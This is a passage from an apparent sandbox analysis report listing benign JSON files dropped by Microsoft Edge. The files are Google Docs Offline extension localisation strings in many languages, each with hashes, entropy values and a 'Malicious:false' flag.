                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                    MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                    SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                    SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                    SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):878
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                    MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                    SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                    SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                    SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2766
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                    MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                    SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                    SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                    SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):978
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                    MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                    SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                    SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                    SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):907
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                    MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                    SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                    SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                    SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                    MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                    SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                    SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                    SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):937
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                    MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                    SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                    SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                    SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1337
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                    MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                    SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                    SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                    SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2846
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                    MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                    SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                    SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                    SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):934
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                    MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                    SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                    SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                    SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):963
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                    MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                    SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                    SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                    SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1320
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                    MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                    SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                    SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                    SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):884
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                    MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                    SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                    SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                    SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):980
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                    MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                    SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                    SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                    SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1941
